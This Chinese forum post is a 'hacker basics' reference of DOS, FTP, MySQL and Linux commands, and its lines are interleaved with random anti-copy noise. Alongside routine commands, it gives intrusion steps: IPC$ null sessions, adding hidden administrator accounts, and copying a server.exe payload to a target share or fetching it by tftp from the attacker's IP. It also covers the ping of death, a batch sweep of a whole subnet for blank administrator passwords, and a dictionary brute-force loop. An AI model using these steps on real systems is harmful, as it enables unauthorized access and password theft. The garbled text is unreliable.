黑客基础--最全的DOS命令 黑客基础, 最全的, DOS命令

admin

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接
/ h0 Y8 B! x3 x3 [net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接 ) I9 l; }. F. L
net use h: [url=file://\\ip\c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H: % U* v2 v# C5 C+ }! k
net use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C：到本地为H: 0 y' x. M3 M: {6 M$ ^1 |2 K
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接
" K7 \1 P) t1 p& l7 u/ \net use h: /del 删除映射对方到本地的为H:的映射
/ N4 y' y0 p& _! u6 F7 E' y5 tnet user 用户名　密码　/add 建立用户
, L6 F7 n. y3 K, y4 Unet user guest /active:yes 激活guest用户
: U4 U8 J5 A2 E) D- |' A. p- @net user 查看有哪些用户
% h4 G) D; x% f+ ^5 w7 V5 Znet user 帐户名 查看帐户的属性
3 o' D, v5 n$ B" enet localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数
& `. i/ D6 U' g& R2 v8 z" |* inet start 查看开启了哪些服务
* K2 G% V$ r4 S! Rnet start 服务名　 开启服务；(如:net start telnet， net start schedule) ( ~7 x0 z( D' V  O& S+ O/ s
net stop 服务名 停止某服务
' L5 q; ]# K' `5 p; v3 Rnet time \\目标ip 查看对方时间
4 v& X( H' E' }+ y, ^net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
6 _/ j, p' V( ?# L+ anet view 查看本地局域网内开启了哪些共享
6 U) o# E! v; c) `% @/ xnet view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享
* p& v7 O2 e' f4 W) D! h9 P/ u+ c1 Lnet config 显示系统网络设置
; [1 `, g0 L3 }: j$ J, L- [7 Jnet logoff 断开连接的共享 7 L3 B/ B7 ^4 f" u( @1 J
net pause 服务名 暂停某服务
6 F# Y, a" A9 Ynet send ip "文本信息" 向对方发信息
+ g% C5 v* c0 Q1 Z0 K& Enet ver 局域网内正在使用的网络连接类型和信息 4 P5 M' z1 \1 B! E* [2 }
net share 查看本地开启的共享
' z8 p4 z: N1 _6 W8 pnet share ipc$ 开启ipc$共享 / l% H' {7 w  p' V" p; C1 Q& r5 J
net share ipc$ /del 删除ipc$共享
' U- r2 E7 r/ t; r( [, S8 Znet share c$ /del 删除C：共享
$ D9 D) H, N9 c  L! S( Ynet user guest 12345 用guest用户登陆后用将密码改为12345 0 `5 [3 W* r' z- F1 O
net password 密码 更改系统登陆密码
- q+ {7 M3 E( i! m. z' [: H6 onetstat -a 查看开启了哪些端口,常用netstat -an 5 ]7 }8 l7 |$ h$ e/ t
netstat -n 查看端口的网络连接情况，常用netstat -an
* q/ B" z' J- E  w( }7 Gnetstat -v 查看正在进行的工作 # s5 R( L. P1 V7 f/ ]
netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）
7 {, n& O, e) z1 e, fnetstat -s 查看正在使用的所有协议使用情况
% d, k. I3 F3 r4 f( R. Tnbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写 , D. q6 v; `: v
tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。
( z1 k# F7 [# C4 Fping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。 6 P4 K  K* ]3 Z5 h2 _- o
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) 2 Z7 q) g+ R( z# B9 M5 G4 O
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息 * ?$ s" N+ a% E  D; Q
tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) 8 Z# K) I4 w, P0 S' v3 F: ~( Q
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) - }6 L" X# N7 k+ O
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
$ q) C- z2 L# J4 z! udel /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同） & o( s( _" y- f0 P1 t$ _( u. k
move 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
1 g9 W! @9 s! ?, pfc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令
: A, n% m" u' B, ]8 eat id号 开启已php?name=%D7%A2%B2%E1"  class="t_tag">注册的某个计划任务 / i. c# A) |/ S3 j
at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止
& Z' b# {9 p! f6 Gat id号 /delete 停止某个已注册的计划任务 : w& p1 I# ?9 P3 E
at 查看所有的计划任务
" v/ Y7 Y0 X, Iat [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 ; F5 \/ L2 }' f6 ^: Q# Z1 @' U
finger username @host 查看最近有哪些用户登陆 . G' D3 g8 ?) Y0 F7 j
telnet ip 端口 远和登陆服务器,默认端口为23
' Q! y5 {! n% D" J! \open ip 连接到IP（属telnet登陆后的命令） 7 ^! ^4 V9 N' P4 F0 @2 l9 d
telnet 在本机上直接键入telnet 将进入本机的telnet
' _" d  _& S4 kcopy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件 1 a. ?: ]1 o7 g  G5 u
copy c:\srv.exe [url=file://\\ip\admin$]\\ip\admin$[/url] 复制本地c:\srv.exe到对方的admin下 , s2 b4 _5 N3 G" W7 N6 W
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件 , {8 q( E/ ~* c" f5 U5 A
copy [url=file://\\ip\admin$\svv.exe]\\ip\admin$\svv.exe[/url] c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C：
, E/ j! k9 A9 y- V7 a( Kxcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件
" |& U- q7 ]/ \3 s, w- F  F+ n% r+ V( Dtftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送
# V* X- ]: C! ^! J; N# s) d' _tftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机 3 ^7 a' O/ G3 K2 }& H
ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)
' q, ?; b4 ^9 P! k8 Rroute print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface 5 W( a- e5 j* Z1 C( l( T
arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
# x) `  R  n0 c9 W1 f6 Z- jstart 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令 0 A' _* V4 \) L: p
mem 查看cpu使用情况 ( |. J6 l) e) F8 }$ u
attrib 文件名(目录名) 查看某文件（目录）的属性
  A  e2 `; F' a1 z5 H! t, d" Lattrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性 4 Q# A+ V) p7 g* d5 P# h  f7 \
dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间 % f& z/ R: T2 K+ b9 O% v
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间
) }1 d' R% F- W. n7 W* \/ [) ~; Jset 指定环境变量名称=要指派给变量的字符 设置环境变量 2 l6 v: Q+ S7 x# ?+ \: M
set 显示当前所有的环境变量 % h% t( f7 j, z, B+ v3 D  N
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
) N/ {. @6 @7 Vpause 暂停批处理程序，并显示出：请按任意键继续.... % r6 x. T+ E! o% p' O
if 在批处理程序中执行条件处理（更多说明见if命令及变量） % Z! g) B% x7 F! y$ R
goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）
& u: d+ F: ]- @' V( ^- K2 l) Acall 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?） / o" E5 u% u) ?) W" g1 F4 T
for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）
5 a6 f# S/ Y8 L2 p; j* @- aecho on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置
8 S% k4 ^5 e! G$ W" _/ C5 k4 g5 b+ _echo 信息 在屏幕上显示出信息
/ K! H% }2 c6 Y( Hecho 信息 >> pass.txt 将"信息"保存到pass.txt文件中 4 k9 |# R0 o" Q+ M$ K5 M* Y( p
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello   N6 H! u% @- e+ S# X) m; c. e" d% Z! J
find 文件名 查找某文件
% N, E0 B7 J+ v4 Qtitle 标题名字 更改CMD窗口标题名字
! H6 E/ `% B7 j2 u" D/ Scolor 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
1 N- f; a3 s, V! Vprompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ ) * W: Y; X( x% _. f
print 文件名 打印文本文件 / \/ A+ P& R" {' m
ver 在DOS窗口下显示版本信息 8 c+ a/ K/ i: q$ T- K; G
winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）
6 b% I# B) r5 i% wformat 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS 9 m: P( r+ }" j7 a
md　目录名 创建目录 ! H; `1 Z+ H" d4 w
replace 源文件　要替换文件的目录 替换文件   p% E! I- U4 Q( \! t1 {
ren 原文件名　新文件名 重命名文件名
: |2 i1 N- l2 dtree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称 6 z% f* T! F5 i6 W' q
type 文件名 显示文本文件的内容
) H$ x2 m. @' zmore 文件名 逐屏显示输出文件 9 i0 \" X  t3 _4 h0 J$ @- y7 t( Z" [
doskey 要锁定的命令＝字符% m/ d0 v% }1 O' f( g: \
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=
8 R- U) `0 L$ f) Q: s6 Ytaskmgr 调出任务管理器 # Q: c( E/ H: Z
chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误 2 u- t8 I- m: X
tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口
) Y( e1 |! o' ^. L4 }exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe
# k, C& b. ]' d& zpath 路径\可执行文件的文件名 为可执行文件设置一个路径。 # C% {( [& r! E9 [5 n
cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /? ' W& `; T  \+ C
regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；
4 l. \$ B& f6 r; L2 S0 Fregedit /e 注册表文件名 导出注册表
# G8 Z2 n. X$ d8 m2 Y  y/ Q- _7 o1 Vcacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。 , `$ e% e5 G  h! \& I. R" ~- C, u# t
cacls 文件名 查看文件的访问用户权限列表
) D4 `* Y" |5 C0 N) vREM 文本内容 在批处理文件中添加注解
4 z. v, v/ R; m2 D0 pnetsh 查看或更改本地网络配置情况
8 M1 C: O  ^) k$ b7 }# WIIS服务命令：
& j/ Z: C7 H$ X/ Q$ f7 hiisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现）
7 f+ N0 s$ s: l) fiisreset /start或stop 启动（停止）所有Internet服务
5 H! }- ?5 [# B  S( s  Qiisreset /restart 停止然后重新启动所有Internet服务
# `& u2 U) q& V% I1 [( niisreset /status 显示所有Internet服务状态
" x, G1 I5 O0 |, ]8 oiisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动 ! K" j# O% B0 i2 R2 [; L
iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机
* n0 x& H, i# k! ~! Siisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务 / i* i& `* E6 Z" @* X' U+ x
iisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。
( t1 A- M, i2 H! vFTP 命令： (后面有详细说明内容) 4 A; a& \, ^4 Y# n
ftp的命令行格式为:3 ~7 w# ^  p* s
ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。
' `; P9 h$ I) K－d 使用调试方式。 5 @2 Q8 V0 h" O/ `8 e, ^* m2 S$ x
－n 限制ftp的自动登录,即不使用.netrc文件。) Y2 X$ Y  U+ v9 Y* P+ t1 p5 \
－g 取消全局文件名。
: X1 `; K8 D4 z6 P% \! _3 Zhelp [命令] 或 ？[命令] 查看命令说明
+ ?- G& K! _* m% D! k+ Y% x) Abye 或 quit 终止主机FTP进程,并退出FTP管理方式. 7 ~! c# Q" \% }+ @
pwd 列出当前远端主机目录 7 g# D+ \: ?7 ~1 L/ S8 L
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
! ]/ \& ?" O3 v# |% rget 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
- b2 C/ ^. N6 b+ @7 zmget [remote-files] 从远端主机接收一批文件至本地主机 : X/ I# H' t% P* K4 A! A
mput local-files 将本地主机中一批文件传送至远端主机
  ?" [+ @/ N2 j. P% Adir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件 ! Z5 Z2 z+ A; z$ i. @
ascii 设定以ASCII方式传送文件(缺省值) / J0 [( C6 k4 Y3 W. T$ \
bin 或 image 设定以二进制方式传送文件 ! U3 s7 a! {$ x5 G7 F3 c
bell 每完成一次文件传送,报警提示
) ?5 ~$ G  ~# k1 O5 s- I3 H1 ^) l0 {cdup 返回上一级目录
; k/ k6 C5 }# L8 iclose 中断与远程服务器的ftp会话(与open对应)
( `, T: q- E- E3 b/ aopen host[port] 建立指定ftp服务器连接,可指定连接端口
: H, V7 ~9 q7 J4 q3 e# D% M; _delete 删除远端主机中的文件
/ s/ u) ?0 |# T1 Y, A7 ?" Ymdelete [remote-files] 删除一批文件 6 v& X2 {$ ~, p
mkdir directory-name 在远端主机中建立目录 7 F% V4 a9 _( e7 m/ n
rename [from] [to] 改变远端主机中的文件名 + W8 f% x; K4 U) H1 F) ?$ c- y
rmdir directory-name 删除远端主机中的目录 * s5 c  k) X4 t4 g9 ?; r. t
status 显示当前FTP的状态 4 k6 |7 Z, ~+ G4 P
system 显示远端主机系统类型 4 l/ _3 s& J+ x
user user-name [password] [account] 重新以别的用户名登录远端主机 + ^, _/ l+ J/ X% S+ u# G
open host [port] 重新建立一个新的连接
. O7 s" j% Y! }3 dprompt 交互提示模式 7 \1 K: p+ G. S, j# ]
macdef 定义宏命令
, m" u  ^/ ]1 Q4 l" g7 v1 Q: D4 }/ {lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
# A+ ?  J* R! C$ Ochmod 改变远端主机的文件权限 9 G8 p2 O- K: _, h* R
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
, D( ]( T# b! p7 @cd remote－dir 进入远程主机目录
/ m' Y3 D% R: `' N9 Q5 H$ Ocdup 进入远程主机目录的父目录 1 o' H$ f1 q+ x5 _
! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip
( w& n, K  v; J/ iMYSQL 命令： % E) ^, b2 O4 r  f' a
mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。
' |2 C! C- }9 ~! |5 |, c, v（例：mysql -h110.110.110.110 -Uroot -P123456
  e% `6 P  @9 Z' e注:u与root可以不用加空格，其它也一样）
5 ]: ~* d% C( ^9 i9 G( fexit 退出MYSQL   x& {6 D, c4 y
mysqladmin -u用户名 -p旧密码 password 新密码 修改密码 ' ~9 v+ B  Z; |) J( V$ c- q
grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符）
& ~. j1 c6 t% _6 U& oshow databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。 ) F0 s: e% W8 i# c" y2 a* T2 k
use mysql；% F3 ^; t# x2 t
show tables; 显示库中的数据表
0 y2 q3 w! b5 bdescribe 表名; 显示数据表的结构
$ S( A9 d. Y3 x& `: j- ]create database 库名; 建库   N1 a" h' M# _" z4 J
use 库名；
+ e) n2 f. K" t. m  i. ^" Kcreate table 表名 (字段设定列表)； 建表 & ~! I$ T& T" g; d- I3 S
drop database 库名;
# u* L8 m% L3 |* g5 L( vdrop table 表名； 删库和删表
! \0 \0 V2 _+ P) X' tdelete from 表名; 将表中记录清空
. Q4 w* ], D' Mselect * from 表名; 显示表中的记录 . J& e  u( \8 H! Z! U
mysqldump --opt school>school.bbb 备份数据库：（命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。
  \. {  b) X9 n4 H* S6 owin2003系统下新增命令（实用部份）：
  n5 W* z# G0 ]- hshutdown /参数 关闭或重启本地或远程主机。. V" U- l. r5 r" a% V  m
参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。
- W( j1 [' t1 F* R例：shutdown /r /t 0 立即重启本地主机（无延时） $ s4 d  s" u6 d" G" G6 V; _
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
0 J% A% d7 b7 U2 u9 W6 g/ p# E参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。
1 b- \7 P" \; K6 a% Qtasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
; V3 Q6 Z/ p6 w8 a: K参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程/ M2 S; I; {+ c) G, e3 r9 l
Linux系统下基本命令： 要区分大小写# d3 p/ ]6 _# q, B+ a$ C  T% z
uname 显示版本信息（同win2K的 ver） : p- t9 v/ y- O5 F* M" w
dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir） - N. p1 k1 C; q$ G1 \7 M
pwd 查询当前所在的目录位置 7 z7 h7 ]  S. L, _. `' j+ e
cd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。 $ X1 \* Q8 R1 H' i- ?: \# _
cat 文件名 查看文件内容
' J0 v6 I! Y3 I) F/ Rcat >abc.txt 往abc.txt文件中写上内容。
) l$ i5 n  h1 A" Y' L/ ]+ vmore 文件名 以一页一页的方式显示一个文本文件。
1 M* b  z9 O) }% b7 hcp 复制文件 & H* j9 E! S; L3 Q+ b2 o
mv 移动文件 % l# \* I' y+ k6 g9 E: Y
rm 文件名 删除文件，rm -a 目录名删除目录及子目录 4 `; q* }: `- }3 P/ `5 q# V% J  _
mkdir 目录名 建立目录 0 U* F* E' j1 i0 L
rmdir 删除子目录，目录内没有文档。 . O5 \2 v. C; J. N/ J
chmod 设定档案或目录的存取权限
2 p7 k! r5 s" k4 m" O' @: Pgrep 在档案中查找字符串
% h2 `/ r  p7 Q5 c  U; Zdiff 档案文件比较
: }5 E+ q* R4 r) j" ^# ofind 档案搜寻
4 L+ F. A8 W( o1 w% ?date 现在的日期、时间
8 |2 }& B2 h) d2 G6 bwho 查询目前和你使用同一台机器的人以及Login时间地点
; `9 q/ n5 i6 I7 I# tw 查询目前上机者的详细资料
  Q" |4 s2 r. F$ Z4 `; `4 ^% v/ Ewhoami 查看自己的帐号名称
3 r, k) P* K, Q& u$ Zgroups 查看某人的Group
! c; ?' H& w$ [5 w7 h2 {; tpasswd 更改密码 8 T4 n: b9 d( T; z: q$ w8 ?
history 查看自己下过的命令 * M+ ^% u$ d4 E1 N& U) d. r2 ?
ps 显示进程状态 ! t* P) ~4 r3 ^7 g* P. X
kill 停止某进程 ; c9 e2 r( A( Z3 X. D1 c
gcc 黑客通常用它来编译C语言写的文件
7 \5 R% j0 u7 ^" b7 Tsu 权限转换为指定使用者 + j: H$ J& r- q, g  [5 L
telnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。
: [# l% Q) B8 \) W( g  D' Aftp ftp连接上某服务器（同win2K4 |- c1 s, m. p4 T1 _; T
附：批处理命令与变量2 a4 @& q' N" U( L/ P
1：for命令及变量 基本格式： 1 X  R; ~: @  e0 V% y
FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。
8 c" l0 }; I( ~8 w批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] pass /user:user 中ip为%1,pass为%2 ,user为%3& `, U  ~1 G6 [3 M
(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1}
9 e/ t/ D* ~! c9 @. ?' Y3 G5 |3 Y9 lcommand：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开
' n: d, e# j% a& |- o" mcommand_parameters：为特定命令指定参数或命令行开关& X( x- C6 x/ K) h" F+ j% x
IN (set)：指在(set)中取值；DO command ：指执行command0 c  W4 P- A! k: z; d" b
参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。 ) M1 b8 k5 p' E  e6 q
用法举例：
8 j  G# D2 B( z@echo off $ n/ r' }" X+ o, t3 \, v
echo 用法格式：test.bat *.*.* > test.txt
1 ]* q: n  X! m9 j' ]for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find "命令成功完成" >>test.txt
4 z, W. I3 b4 [% J9 q存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。
, p, K$ ~0 N; k: ?0 p( G/ {" ^- h- F/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。 7 P1 }( \0 o, A, b( D
@echo off
4 @' ~/ y" r: p8 }, Q$ |7 [$ M- p3 Uecho 用法格式：ok.bat ip 3 L% T: m# Y) e
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
! C5 y/ G9 O6 n0 n- s6 M存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。! O' @$ K" v& f$ ]3 U  q; q
2：if命令及变量 基本格式： " ?" g( B2 Q0 W; |
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。
" G! z5 y# \" A5 l: X) q4 m+ m例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。6 n, c5 q, m6 w7 n
0 指发现并成功执行（真）；1 指没有发现、没执行（假）。
6 [4 o7 I* c, [, H2 {% ?IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。6 g: O- Z: ^. C0 [' N
例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "） + m9 w  f  D0 C9 z3 p' O  k
IF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。8 }# w2 c9 _0 {$ a
例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。 & H0 n. E0 S% |/ ^$ a9 w7 P
IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”